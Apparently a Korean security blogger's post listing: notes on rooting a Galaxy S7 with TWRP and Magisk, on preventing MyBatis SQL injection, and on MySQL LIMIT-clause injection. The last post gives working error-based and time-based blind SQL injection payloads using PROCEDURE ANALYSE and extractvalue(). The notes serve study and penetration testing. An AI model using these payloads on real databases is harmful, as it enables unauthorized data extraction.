'전체 글'에 해당되는 글 589건

갤럭시 S7 루팅

모바일 2020. 8. 24. 21:11

https://dl.twrp.me/herolte/

 

Download TWRP for herolte

Team Win strives to provide a quality product. However, it is your decision to install our software on your device. Team Win takes no responsibility for any damage that may occur from installing or using TWRP. We recommend downloading the latest version of

dl.twrp.me

https://github.com/topjohnwu/Magisk/releases

 

Releases · topjohnwu/Magisk

The Magic Mask for Android. Contribute to topjohnwu/Magisk development by creating an account on GitHub.

github.com

deliberate-practice.tistory.com/54

 

Magisk를 이용한 안드로이드 루팅

Magisk를 이용한 안드로이드 루팅 Magisk를 이용하여 루팅하는 방법을 알아보겠습니다. Magisk는 /system 디렉토리를 변경하지 않고 루트 권한 획득이 가능하고 Magisk Manager 앱에서 쉽게 다양한 모듈

deliberate-practice.tistory.com

https://dl.twrp.me/hlteskt/

 

Download TWRP for hlteskt

Team Win strives to provide a quality product. However, it is your decision to install our software on your device. Team Win takes no responsibility for any damage that may occur from installing or using TWRP. We recommend downloading the latest version of

dl.twrp.me

 

- G7 루팅 할려다가 엄청나게 삽질을 하여 기록을 남겨둠

- 해당 방법은 안드로이드 8.0에서 진행하였고, Super Su가 아닌 Magisk를 이용한 루팅 방법이다.

- 만약 리커버리에서 나처럼 Super Su 설치를 진행하면 그냥 순정펌웨어 설치하는게 정신 건강에 좋다.

 

G7 TWRP 설치 및 Magisk 설치

 

준비물

G7(SM-G930S), Odin3 v3.13, TWRP, Magisk Manager, Magisk.apk 

 

- 최초 리커버리 이미지 설치 : 볼륨 하 + 홈 버튼 + 전원 버튼 

- 리커버리 접근 : 볼륨 상 + 홈 버튼 + 전원 버튼

 

1. Odin 이용 시 Auto Reboot, Reset Time 제거 후 진행

2. 메인 메뉴에서 Wipe 선택 > 우측 하단의 Format Data 선택 > yes 입력 후 키보드 우측 하단의 체크 버튼 선택

(무결성 검증 때문에 필수)

3. adb push /Magisk-v20.3.zip /sdcard 후 install 설치

4. 리커버리 및 Magisk 설치 후 기기 내 Magisk.apk 설치 

 

- 참고

오딘으로 TWRP를 설치하고 부팅을 하면 순정리커버리로 복원됩니다.
TWRP를 설치할때 오딘에서 Auto Reboot에 체크를 해제하라는게 이것때문이지요.
오딘에서 Auto Reboot에 체크를 해제해도 바로 부팅을 시켜버리면 순정리커버리로 복원되어버립니다.
오딘에서 TWRP를 올린후 바로 리커버리로 진입하세요. 잘못해서 부팅되버리면 도루묵입니다.
이게 어렵다 싶으시다면 CAF Auto Root로 루팅을 먼저 하신후 Flashify 앱으로 리커버리를 설치하는 방법도 있습니다. 

 

 



'모바일' 카테고리의 다른 글

메모리 덤프 시 평문 추출 대응 방안  (0) 2020.09.06
모바일 usb 케이블 사용 여부 탐지  (0) 2020.09.06
frida iOS hook  (0) 2020.08.10
frida 추가  (0) 2020.08.10
iOS (SSL Pinning)  (0) 2020.08.09
블로그 이미지

wtdsoul

,

Spring mybatis SQL 인젝션 대응

2020. 8. 20. 11:02

 

https://sas-study.tistory.com/96

 

Spring mybatis에서 #{ }문법과 ${ }문법의 차이점(feat. SQL Injection)

안녕하세요. 오늘 공유할 내용은 Spring mybatis에서 사용하는 #{} 문법과 ${} 문법의 차이와 ${}문법을 사용했을때 발생할 수 있는 SQL Injection이라는 해킹 방법에 대하여 내용을 공유하고자 합니다. 먼

sas-study.tistory.com

http://apollo89.com/wordpress/?p=2175

 

mybatis sql injection 취약점 » Apollo89.com

Notice : 해당 자료가 저작권등에 의해서 문제가 있다면 바로 삭제하겠습니다. 연구목적으로 사용하지 않고 악의적인 목적으로 이용할 경우 발생할 수 있는 법적은 책임은 모두 본인에게 있습니��

apollo89.com

- 입력 값을 반드시 검증 후 사용

- $ 파라미터 대신 # 파라미터를 사용

 

'' 카테고리의 다른 글

TLS 1.0, 1.1 중단 일정  (0) 2020.10.12
Burp Suite 단축키 관련  (0) 2020.09.02
Procedure Analysis SQL 인젝션  (0) 2020.08.13
CORS (Cross Origin Resource Sharing)  (0) 2020.08.11
DNS Rebinding 을 이용한 우회  (0) 2020.08.10
블로그 이미지

wtdsoul

,

Procedure Analysis SQL 인젝션

2020. 8. 13. 10:00

 

https://tempuss.tistory.com/entry/Limit-%EC%A0%88%EC%97%90%EC%84%9C%EC%9D%98-SQL-Injection

 

Procedure analyse()를 이용한 SQL Injection

[LIMIT {[ offset ,] row_count | row_count OFFSET offset }] [PROCEDURE procedure_name ( argument_list )] [INTO OUTFILE ' file_name ' [CHARACTER SET charset_name ] export_options | INTO DUMPFILE ' fil..

tempuss.tistory.com

https://www.hides.kr/284

 

Limit 구문에서의 SQL Injection

rubiya의 LOS 를 풀다가 알게된 기법을 적으려 한다. 이 기법은 사용자의 입력값이 아래와 같이 LIMIT 절 다음에 들어갈 시 사용할 수 있는 취약점이다. SELECT * FROM member WHERE id='guest' LIMIT {user input..

www.hides.kr

참고

CTF가 아닌 현업에서 실제로 실행된 사례가 있어서 참고함

 

 

그중에서 사용되는 함수는 다양하지만

extractvalue()라는 함수가 있습니다.

 

mysql> SELECT * FROM user WHERE id='admin' limit 1 procedure analyse(extractvalue(1,concat(0x3a,version())),1); ERROR 1105 (HY000): XPATH syntax error: ':5.1.41-community' mysql>

 

이렇게 하면 version을 뽑을 수 있습니다.

그 외에도 information_schema에 접근하여 DB와 테이블명에 대해서도 뽑아 올 수 있습니다. 

 

쿼리)

procedure%20analyse(extractvalue(1,concat(0x3a,version())),1) 

 

 

- error base

mysql SELECT id FROM test WHERE id='admin' limit 0,1 procedure analyse(extractvalue(1, concat(0x3a, version())), 1);

ERROR 1105 (HY000): XPATH syntax error: ':5.1.41-community'

 

- blind

mysql > SELECT id FROM test WHERE id='admin' limit 0,1 procedure analyse(extractvalue(1, concat(0x3a, (if(mid(version(),1,1) like 5, sleep(5),1))), 1);

 

 

limit 1 procedure analyse(extractvalue(1,concat(0x3a,if(ascii(substr(version(),1,1))>10,sleep(1),0))),1);

-> Only constant XPATH queries are supported

sleep 함수대신 benchmark 함수를 써본다.

 

limit 1 procedure analyse(extractvalue(1,concat(0x3a,if(ascii(substr(version(),1,1))>10,benchmark(1000000,sha('a')),0))),1);

 

성공적으로 시간지연이 일어나고 한글자씩 추출해낼 수 있다.

 

 

'' 카테고리의 다른 글

Burp Suite 단축키 관련  (0) 2020.09.02
Spring mybatis SQL 인젝션 대응  (0) 2020.08.20
CORS (Cross Origin Resource Sharing)  (0) 2020.08.11
DNS Rebinding 을 이용한 우회  (0) 2020.08.10
Web Assembly 시작  (0) 2020.08.09
블로그 이미지

wtdsoul

,

공지사항

태그목록

글 보관함

달력

«   2025/02   »
1
2 3 4 5 6 7 8
9 10 11 12 13 14 15
16 17 18 19 20 21 22
23 24 25 26 27 28

티스토리툴바